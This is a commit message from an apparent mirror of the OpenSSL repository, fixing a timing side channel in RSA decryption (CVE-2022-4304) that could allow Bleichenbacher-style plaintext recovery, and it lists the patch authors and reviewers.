• D
    Fix Timing Oracle in RSA decryption · a98b861d
    Dmitry Belyavskiy 提交于
    A timing based side channel exists in the OpenSSL RSA Decryption
    implementation which could be sufficient to recover a plaintext across
    a network in a Bleichenbacher style attack. To achieve a successful
    decryption an attacker would have to be able to send a very large number
    of trial messages for decryption. The vulnerability affects all RSA
    padding modes: PKCS#1 v1.5, RSA-OEAP and RSASVE.
    
    Patch written by Dmitry Belyavsky and Hubert Kario
    
    CVE-2022-4304
    Reviewed-by: NMatt Caswell <matt@openssl.org>
    Reviewed-by: NTomas Mraz <tomas@openssl.org>
    Signed-off-by: Ncode4lala <fengziteng2@huawei.com>
    Change-Id: Ib81f15484fa3374bf5f50baece50bb36d105d6d7
    a98b861d
bn_local.h 25.3 KB